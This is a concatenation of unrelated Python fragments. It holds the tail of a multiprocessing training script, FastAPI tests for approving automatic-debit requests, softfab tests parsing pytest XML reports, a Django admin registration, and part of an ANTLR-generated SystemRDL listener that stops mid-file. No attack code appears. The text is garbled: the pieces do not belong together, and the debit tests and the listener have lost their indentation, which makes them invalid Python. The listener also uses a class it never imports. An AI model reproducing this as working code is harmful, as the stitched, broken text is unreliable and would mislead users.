    p2.join()
    p3.join()
    t2=time.time()
    print((t2-t1)/60)
    t1=time.time()
    p1 = Process(target=masks, args=(n_ite,[False,False,True],))
    p2 = Process(target=masks, args=(n_ite,[False,True,False],))
    p3 = Process(target=masks, args=(n_ite,[True,False,False],))
    p1.start()
    p2.start()
    p3.start()
    p1.join()
    p2.join()
    p3.join()
    t2=time.time()
    print((t2-t1)/60)
    '''
    #predict_seg_merge_mask(['model61','model62','model63'],3,[0.09,0.15,0.14],ifrun=[False,True,True])
    '''
    models=['67','68','69']
    n_ite_train=5
    path_model='D:\\codes\\Graduation\\MODELS\\model'+models[0]
    path_sta='D:\\codes\\Graduation\\MODELS\\sta'+models[0]
    path_label='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub1_merge'
    path_mask='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub1_mask'
    sub_name='train_sub1'
    util.changename(path_label,'label')
    util.changename(path_mask,'label')
    t1=train_test(path_model,path_sta,path_label,path_mask,sub_name)
    path_model='D:\\codes\\Graduation\\MODELS\\model'+models[1]
    path_sta='D:\\codes\\Graduation\\MODELS\\sta'+models[1]
    path_label='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub2_merge'
    path_mask='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub2_mask'
    sub_name='train_sub2'
    util.changename(path_label,'label')
    util.changename(path_mask,'label')
    t2=train_test(path_model,path_sta,path_label,path_mask,sub_name)
    path_model='D:\\codes\\Graduation\\MODELS\\model'+models[2]
    path_sta='D:\\codes\\Graduation\\MODELS\\sta'+models[2]
    path_label='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub3_merge'
    path_mask='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub3_mask'
    sub_name='train_sub3'
    util.changename(path_label,'label')
    util.changename(path_mask,'label')
    t3=train_test(path_model,path_sta,path_label,path_mask,sub_name)
    #predict_seg_merge_mask(['model'+models[0],'model'+models[1],'model'+models[2]],n_ite_train,[t1,t2,t3])
    '''
from fastapi.testclient import TestClient
from sqlalchemy.orm import Session
from app.core import config
from app.tests.utils.debit import create_debit_request
"""
[x] - Autenticação e acesso a plataforma
Um usuário autenticado,
[x] - solicita uma ativação de débito automático
[x] - cancela uma solicitação de ativação (super user)
[x] - aprova uma solicitação de ativação (super user)
[x] - rejeita uma solicitação de ativação (super user)
[x] - visualiza uma solicitação
"""
def test_request_automatic_debit(client: TestClient,
normal_random_user_token_headers: dict,
db: Session):
res = client.get(f"{config.API_V1_STR}/debits/request",
headers=normal_random_user_token_headers)
assert res.status_code == 200
def test_cancel_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "canceled"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 200
data = res.json()
assert data["status"] == status_in
def test_cancel_request_automatic_debit_with_normal_user(
client: TestClient,
normal_user_token_headers: dict,
db: Session
):
status_in = "canceled"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=normal_user_token_headers
)
assert res.status_code == 400
def test_approve_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "approved"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 200
data = res.json()
assert data["status"] == status_in
def test_approve_request_automatic_debit_with_normal_user(
client: TestClient,
normal_user_token_headers: dict,
db: Session
):
status_in = "canceled"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=normal_user_token_headers
)
assert res.status_code == 400
def test_reject_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "rejected"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 200
data = res.json()
assert data["status"] == status_in
def test_reject_request_automatic_debit_with_normal_user(
client: TestClient,
normal_user_token_headers: dict,
db: Session
):
status_in = "rejected"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=normal_user_token_headers
)
assert res.status_code == 400
def test_invalid_status_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "papibaquigrafo"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 422
def test_get_request_automatic_debit(
client: TestClient,
normal_random_user_token_headers: dict,
superuser_token_headers: dict,
db: Session
):
res = client.get(f"{config.API_V1_STR}/debits/request",
headers=normal_random_user_token_headers)
assert res.status_code == 200
data = res.json()
status_in = "approved"
res2 = client.put(
f"{config.API_V1_STR}/debits/{data['id']}?status={status_in}",
headers=superuser_token_headers
)
assert res2.status_code == 200
data2 = res2.json()
assert data2["status"] == status_in
res3 = client.get(f"{config.API_V1_STR}/debits/{data2['owner_id']}",
headers=normal_random_user_token_headers)
assert res3.status_code == 200
data3 = res3.json()
assert data2["id"] == data3["id"]
# SPDX-License-Identifier: BSD-3-Clause
from io import StringIO
from softfab.reportlib import parseReport
from softfab.resultcode import ResultCode
def testParsePytestEmpty():
    """Parse a report from pytest that contains no test cases."""
    xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="0" hostname="hyperion" name="pytest" skipped="0" tests="0" time="0.569" timestamp="2020-08-14T01:10:52.311169"/>
</testsuites>
'''.lstrip()

    report = parseReport(lambda: StringIO(xml), 'report.xml')
    assert report is not None
    assert report.errors == 0
    assert report.failures == 0
    assert report.skipped == 0
    assert report.numTestcases == 0
    assert report.result is ResultCode.CANCELLED
    assert report.summary == 'no test cases found'

    data = report.data
    assert data['testcases'] == '0'
    assert data['checks'] == '0'
    assert data['failures'] == '0'
    assert data['errors'] == '0'
    assert data['skipped'] == '0'

    assert len(report.testsuite) == 1
    suite, = report.testsuite
    assert suite.tests == 0
    assert suite.failures == 0
    assert suite.errors == 0
    assert suite.skipped == 0
    assert suite.time == 0.569
    assert suite.result is ResultCode.CANCELLED
    assert not suite.testcase
def testParsePytestAllPass():
    """Parse a report from pytest where all tests pass."""
    xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="0" hostname="hyperion" name="pytest" skipped="0" tests="3" time="1.234" timestamp="2020-08-13T13:03:59.945171">
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[Database]" time="0.216"/>
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[VersionedDatabase]" time="0.001"/>
<testcase classname="test_databaselib" file="test_databaselib.py" line="338" name="testMixedRandom" time="0.749">
<system-out>Random seed: 1597316644
</system-out>
</testcase>
</testsuite>
</testsuites>
'''.lstrip()

    report = parseReport(lambda: StringIO(xml), 'report.xml')
    assert report is not None
    assert report.errors == 0
    assert report.failures == 0
    assert report.skipped == 0
    assert report.numTestcases == 3
    assert report.result is ResultCode.OK
    assert report.summary == '0 failed'

    data = report.data
    assert data['testcases'] == '3'
    assert data['checks'] == '3'
    assert data['failures'] == '0'
    assert data['errors'] == '0'
    assert data['skipped'] == '0'

    assert len(report.testsuite) == 1
    suite, = report.testsuite
    assert suite.tests == 3
    assert suite.failures == 0
    assert suite.errors == 0
    assert suite.skipped == 0
    assert suite.time == 1.234
    assert suite.result is ResultCode.OK
    assert len(suite.testcase) == 3
    for case in suite.testcase:
        assert case.result is ResultCode.OK
        assert not case.error
        assert not case.failure
        assert not case.skipped
def testParsePytestSomeFail():
    """Parse a report from pytest where some tests fail."""
    xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="1" hostname="hyperion" name="pytest" skipped="0" tests="3" time="1.234" timestamp="2020-08-13T13:03:59.945171">
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[Database]" time="0.216"/>
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[VersionedDatabase]" time="0.001"/>
<testcase classname="test_joblib.TestJobs" file="test_joblib.py" line="444" name="test0110TRSetRandomRun" time="0.000">
<failure message="RuntimeError: forced">self = &lt;test_joblib.TestJobs testMethod=test0110TRSetRandomRun&gt;
def setUp(self):
&gt; raise RuntimeError('forced')
E RuntimeError: forced
test_joblib.py:45: RuntimeError</failure>
</testcase>
</testsuite>
</testsuites>
'''.lstrip()

    report = parseReport(lambda: StringIO(xml), 'report.xml')
    assert report is not None
    assert report.errors == 0
    assert report.failures == 1
    assert report.skipped == 0
    assert report.numTestcases == 3
    assert report.result is ResultCode.WARNING
    assert report.summary == '1 failed'

    data = report.data
    assert data['testcases'] == '3'
    assert data['checks'] == '3'
    assert data['failures'] == '1'
    assert data['errors'] == '0'
    assert data['skipped'] == '0'

    assert len(report.testsuite) == 1
    suite, = report.testsuite
    assert suite.tests == 3
    assert suite.failures == 1
    assert suite.errors == 0
    assert suite.skipped == 0
    assert suite.time == 1.234
    assert suite.result is ResultCode.WARNING
    assert len(suite.testcase) == 3
    for index, case in enumerate(suite.testcase):
        if index == 2:
            assert case.result is ResultCode.WARNING
            assert case.failure
        else:
            assert case.result is ResultCode.OK
            assert not case.failure
        assert not case.error
        assert not case.skipped
def testParsePytestSomeSkipped():
    """Parse a report from pytest where some tests were skipped."""
    xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="0" hostname="hyperion" name="pytest" skipped="1" tests="3" time="1.234" timestamp="2020-08-13T13:03:59.945171">
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[Database]" time="0.216"/>
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[VersionedDatabase]" time="0.001"/>
<testcase classname="test_taskrunnerlib" file="test_taskrunnerlib.py" line="211" name="testTaskRunnerToXML[data0]" time="0.000">
<skipped message="test fails if there is a module reload between collection and execution, as it breaks isinstance() inside __eq__()" type="pytest.skip">test_taskrunnerlib.py:211: test fails if there is a module reload between collection and execution, as it breaks isinstance() inside __eq__()</skipped>
</testcase>
</testsuite>
</testsuites>
'''.lstrip()

    report = parseReport(lambda: StringIO(xml), 'report.xml')
    assert report is not None
    assert report.errors == 0
    assert report.failures == 0
    assert report.skipped == 1
    assert report.numTestcases == 3
    assert report.result is ResultCode.OK
    assert report.summary == '0 failed, 1 skipped'

    data = report.data
    assert data['testcases'] == '3'
    assert data['checks'] == '3'
    assert data['failures'] == '0'
    assert data['errors'] == '0'
    assert data['skipped'] == '1'

    assert len(report.testsuite) == 1
    suite, = report.testsuite
    assert suite.tests == 3
    assert suite.failures == 0
    assert suite.errors == 0
    assert suite.skipped == 1
    assert suite.time == 1.234
    assert suite.result is ResultCode.OK
    assert len(suite.testcase) == 3
    for index, case in enumerate(suite.testcase):
        if index == 2:
            assert case.result is ResultCode.CANCELLED
            assert case.skipped
        else:
            assert case.result is ResultCode.OK
            assert not case.skipped
        assert not case.error
        assert not case.failure
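The tests above exercise softfab's parseReport on JUnit-style XML. The same suite and case attributes those tests assert on can be read with the standard library alone; this is a sketch with a made-up inline document, not the project's actual parser:

```python
import xml.etree.ElementTree as ET

# Minimal made-up JUnit-style report, same shape as the ones in the tests.
xml = '''<testsuites>
<testsuite errors="0" failures="1" skipped="0" tests="3" time="1.234">
<testcase name="a" time="0.2"/>
<testcase name="b" time="0.1"/>
<testcase name="c" time="0.0"><failure message="boom"/></testcase>
</testsuite>
</testsuites>'''

suite = ET.fromstring(xml).find('testsuite')
failures = int(suite.get('failures'))  # suite-level counter attribute
# A case failed iff it carries a <failure> child element.
failed = [c.get('name') for c in suite.findall('testcase')
          if c.find('failure') is not None]
print(failures, failed)  # 1 ['c']
```

Note the same convention the tests rely on: counts live in testsuite attributes, while per-case outcome is encoded by the presence of a failure/skipped child.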
from django.contrib import admin
from src.split.models import Split
from .models import Log
admin.site.register(Log)
admin.site.register(Split)
# Generated from ../ordt/parse/grammars/SystemRDL.g4 by ANTLR 4.5.3
if __name__ is not None and "." in __name__:
from .SystemRDLParser import SystemRDLParser
else:
from SystemRDLParser import SystemRDLParser
enable_debug = False
# This class defines a complete listener for a parse tree produced by SystemRDLParser.
class SystemRDLListener(ParseTreeListener):
# Enter a parse tree produced by SystemRDLParser#root.
def enterRoot(self, ctx:SystemRDLParser.RootContext):
if enable_debug:
print("enterRoot")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#root.
def exitRoot(self, ctx:SystemRDLParser.RootContext):
if enable_debug:
print("exitRoot")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#parameter_block.
def enterParameter_block(self, ctx:SystemRDLParser.Parameter_blockContext):
if enable_debug:
print("enterParameter_block")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#parameter_block.
def exitParameter_block(self, ctx:SystemRDLParser.Parameter_blockContext):
if enable_debug:
print("exitParameter_block")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_definition.
def enterProperty_definition(self, ctx:SystemRDLParser.Property_definitionContext):
if enable_debug:
print("enterProperty_definition")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_definition.
def exitProperty_definition(self, ctx:SystemRDLParser.Property_definitionContext):
if enable_debug:
print("exitProperty_definition")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_body.
def enterProperty_body(self, ctx:SystemRDLParser.Property_bodyContext):
if enable_debug:
print("enterProperty_body")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_body.
def exitProperty_body(self, ctx:SystemRDLParser.Property_bodyContext):
if enable_debug:
print("exitProperty_body")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_type.
def enterProperty_type(self, ctx:SystemRDLParser.Property_typeContext):
if enable_debug:
print("enterProperty_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_type.
def exitProperty_type(self, ctx:SystemRDLParser.Property_typeContext):
if enable_debug:
print("exitProperty_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_default.
def enterProperty_default(self, ctx:SystemRDLParser.Property_defaultContext):
if enable_debug:
print("enterProperty_default")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_default.
def exitProperty_default(self, ctx:SystemRDLParser.Property_defaultContext):
if enable_debug:
print("exitProperty_default")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_usage.
def enterProperty_usage(self, ctx:SystemRDLParser.Property_usageContext):
if enable_debug:
print("enterProperty_usage")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_usage.
def exitProperty_usage(self, ctx:SystemRDLParser.Property_usageContext):
if enable_debug:
print("exitProperty_usage")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_component.
def enterProperty_component(self, ctx:SystemRDLParser.Property_componentContext):
if enable_debug:
print("enterProperty_component")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_component.
def exitProperty_component(self, ctx:SystemRDLParser.Property_componentContext):
if enable_debug:
print("exitProperty_component")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_boolean_type.
def enterProperty_boolean_type(self, ctx:SystemRDLParser.Property_boolean_typeContext):
if enable_debug:
print("enterProperty_boolean_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_boolean_type.
def exitProperty_boolean_type(self, ctx:SystemRDLParser.Property_boolean_typeContext):
if enable_debug:
print("exitProperty_boolean_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_string_type.
def enterProperty_string_type(self, ctx:SystemRDLParser.Property_string_typeContext):
if enable_debug:
print("enterProperty_string_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_string_type.
def exitProperty_string_type(self, ctx:SystemRDLParser.Property_string_typeContext):
if enable_debug:
print("exitProperty_string_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_number_type.
def enterProperty_number_type(self, ctx:SystemRDLParser.Property_number_typeContext):
if enable_debug:
print("enterProperty_number_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_number_type.
def exitProperty_number_type(self, ctx:SystemRDLParser.Property_number_typeContext):
if enable_debug:
print("exitProperty_number_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_ref_type.
def enterProperty_ref_type(self, ctx:SystemRDLParser.Property_ref_typeContext):
if enable_debug:
print("enterProperty_ref_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_ref_type.
def exitProperty_ref_type(self, ctx:SystemRDLParser.Property_ref_typeContext):
if enable_debug:
print("exitProperty_ref_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#component_def.
def enterComponent_def(self, ctx:SystemRDLParser.Component_defContext):
if enable_debug:
print("enterComponent_def")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#component_def.
def exitComponent_def(self, ctx:SystemRDLParser.Component_defContext):
if enable_debug:
print("exitComponent_def")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#explicit_component_inst.
def enterExplicit_component_inst(self, ctx:SystemRDLParser.Explicit_component_instContext):
if enable_debug:
print("enterExplicit_component_inst")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#explicit_component_inst.
def exitExplicit_component_inst(self, ctx:SystemRDLParser.Explicit_component_instContext):
if enable_debug:
print("exitExplicit_component_inst")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#anonymous_component_inst_elems.
def enterAnonymous_component_inst_elems(self, ctx:SystemRDLParser.Anonymous_component_inst_elemsContext):
if enable_debug:
print("enterAnonymous_component_inst_elems")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#anonymous_component_inst_elems.
def exitAnonymous_component_inst_elems(self, ctx:SystemRDLParser.Anonymous_component_inst_elemsContext):
if enable_debug:
print("exitAnonymous_component_inst_elems")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_clause.
def enterExternal_clause(self, ctx:SystemRDLParser.External_clauseContext):
if enable_debug:
print("enterExternal_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_clause.
def exitExternal_clause(self, ctx:SystemRDLParser.External_clauseContext):
if enable_debug:
print("exitExternal_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_parallel_clause.
def enterExternal_parallel_clause(self, ctx:SystemRDLParser.External_parallel_clauseContext):
if enable_debug:
print("enterExternal_parallel_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_parallel_clause.
def exitExternal_parallel_clause(self, ctx:SystemRDLParser.External_parallel_clauseContext):
if enable_debug:
print("exitExternal_parallel_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_sram_clause.
def enterExternal_sram_clause(self, ctx:SystemRDLParser.External_sram_clauseContext):
if enable_debug:
print("enterExternal_sram_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_sram_clause.
def exitExternal_sram_clause(self, ctx:SystemRDLParser.External_sram_clauseContext):
if enable_debug:
print("exitExternal_sram_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_serial8_clause.
def enterExternal_serial8_clause(self, ctx:SystemRDLParser.External_serial8_clauseContext):
if enable_debug:
print("enterExternal_serial8_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_serial8_clause.
def exitExternal_serial8_clause(self, ctx:SystemRDLParser.External_serial8_clauseContext):
if enable_debug:
print("exitExternal_serial8_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_ring_clause.
def enterExternal_ring_clause(self, ctx:SystemRDLParser.External_ring_clauseContext):
if enable_debug:
print("enterExternal_ring_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_ring_clause.
def exitExternal_ring_clause(self, ctx:SystemRDLParser.External_ring_clauseContext):
if enable_debug:
print("exitExternal_ring_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_dly_option_clause.
def enterExternal_dly_option_clause(self, ctx:SystemRDLParser.External_dly_option_clauseContext):
if enable_debug:
print("enterExternal_dly_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_dly_option_clause.
def exitExternal_dly_option_clause(self, ctx:SystemRDLParser.External_dly_option_clauseContext):
if enable_debug:
print("exitExternal_dly_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_opt_option_clause.
def enterExternal_opt_option_clause(self, ctx:SystemRDLParser.External_opt_option_clauseContext):
if enable_debug:
print("enterExternal_opt_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_opt_option_clause.
def exitExternal_opt_option_clause(self, ctx:SystemRDLParser.External_opt_option_clauseContext):
if enable_debug:
print("exitExternal_opt_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_field_data_option_clause.
def enterExternal_field_data_option_clause(self, ctx:SystemRDLParser.External_field_data_option_clauseContext):
if enable_debug:
print("enterExternal_field_data_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_field_data_option_clause.
def exitExternal_field_data_option_clause(self, ctx:SystemRDLParser.External_field_data_option_clauseContext):
if enable_debug:
print("exitExternal_field_data_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_rep_level_option_clause.
def enterExternal_rep_level_option_clause(self, ctx:SystemRDLParser.External_rep_level_option_clauseContext):
if enable_debug:
print("enterExternal_rep_level_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_rep_level_option_clause.
def exitExternal_rep_level_option_clause(self, ctx:SystemRDLParser.External_rep_level_option_clauseContext):
if enable_debug:
print("exitExternal_rep_level_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#component_inst_elem.
def enterComponent_inst_elem(self, ctx:SystemRDLParser.Component_inst_elemContext):
if enable_debug:
print("enterComponent_inst_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#component_inst_elem.
def exitComponent_inst_elem(self, ctx:SystemRDLParser.Component_inst_elemContext):
if enable_debug:
print("exitComponent_inst_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#array.
def enterArray(self, ctx:SystemRDLParser.ArrayContext):
if enable_debug:
print("enterArray")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#array.
def exitArray(self, ctx:SystemRDLParser.ArrayContext):
if enable_debug:
print("exitArray")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#instance_ref.
def enterInstance_ref(self, ctx:SystemRDLParser.Instance_refContext):
if enable_debug:
print("enterInstance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#instance_ref.
def exitInstance_ref(self, ctx:SystemRDLParser.Instance_refContext):
if enable_debug:
print("exitInstance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#simple_instance_ref.
def enterSimple_instance_ref(self, ctx:SystemRDLParser.Simple_instance_refContext):
if enable_debug:
print("enterSimple_instance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#simple_instance_ref.
def exitSimple_instance_ref(self, ctx:SystemRDLParser.Simple_instance_refContext):
if enable_debug:
print("exitSimple_instance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#verilog_expression.
def enterVerilog_expression(self, ctx:SystemRDLParser.Verilog_expressionContext):
if enable_debug:
print("enterVerilog_expression")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#verilog_expression.
def exitVerilog_expression(self, ctx:SystemRDLParser.Verilog_expressionContext):
if enable_debug:
print("exitVerilog_expression")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#instance_ref_elem.
def enterInstance_ref_elem(self, ctx:SystemRDLParser.Instance_ref_elemContext):
if enable_debug:
print("enterInstance_ref_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#instance_ref_elem.
def exitInstance_ref_elem(self, ctx:SystemRDLParser.Instance_ref_elemContext):
if enable_debug:
print("exitInstance_ref_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_assign.
def enterProperty_assign(self, ctx:SystemRDLParser.Property_assignContext):
if enable_debug:
print("enterProperty_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_assign.
def exitProperty_assign(self, ctx:SystemRDLParser.Property_assignContext):
if enable_debug:
print("exitProperty_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#default_property_assign.
def enterDefault_property_assign(self, ctx:SystemRDLParser.Default_property_assignContext):
if enable_debug:
print("enterDefault_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#default_property_assign.
def exitDefault_property_assign(self, ctx:SystemRDLParser.Default_property_assignContext):
if enable_debug:
print("exitDefault_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#explicit_property_assign.
def enterExplicit_property_assign(self, ctx:SystemRDLParser.Explicit_property_assignContext):
if enable_debug:
print("enterExplicit_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#explicit_property_assign.
def exitExplicit_property_assign(self, ctx:SystemRDLParser.Explicit_property_assignContext):
if enable_debug:
print("exitExplicit_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#post_property_assign.
def enterPost_property_assign(self, ctx:SystemRDLParser.Post_property_assignContext):
if enable_debug:
print("enterPost_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#post_property_assign.
def exitPost_property_assign(self, ctx:SystemRDLParser.Post_property_assignContext):
if enable_debug:
print("exitPost_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_assign_rhs.
def enterProperty_assign_rhs(self, ctx:SystemRDLParser.Property_assign_rhsContext):
if enable_debug:
print("enterProperty_assign_rhs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_assign_rhs.
def exitProperty_assign_rhs(self, ctx:SystemRDLParser.Property_assign_rhsContext):
if enable_debug:
print("exitProperty_assign_rhs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#concat.
def enterConcat(self, ctx:SystemRDLParser.ConcatContext):
if enable_debug:
print("enterConcat")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#concat.
def exitConcat(self, ctx:SystemRDLParser.ConcatContext):
if enable_debug:
print("exitConcat")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#concat_elem.
def enterConcat_elem(self, ctx:SystemRDLParser.Concat_elemContext):
if enable_debug:
print("enterConcat_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#concat_elem.
def exitConcat_elem(self, ctx:SystemRDLParser.Concat_elemContext):
if enable_debug:
print("exitConcat_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property.
def enterProperty(self, ctx:SystemRDLParser.PropertyContext):
if enable_debug:
print("enterProperty")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property.
def exitProperty(self, ctx:SystemRDLParser.PropertyContext):
if enable_debug:
print("exitProperty")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#unimplemented_property.
def enterUnimplemented_property(self, ctx:SystemRDLParser.Unimplemented_propertyContext):
if enable_debug:
print("enterUnimplemented_property")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#unimplemented_property.
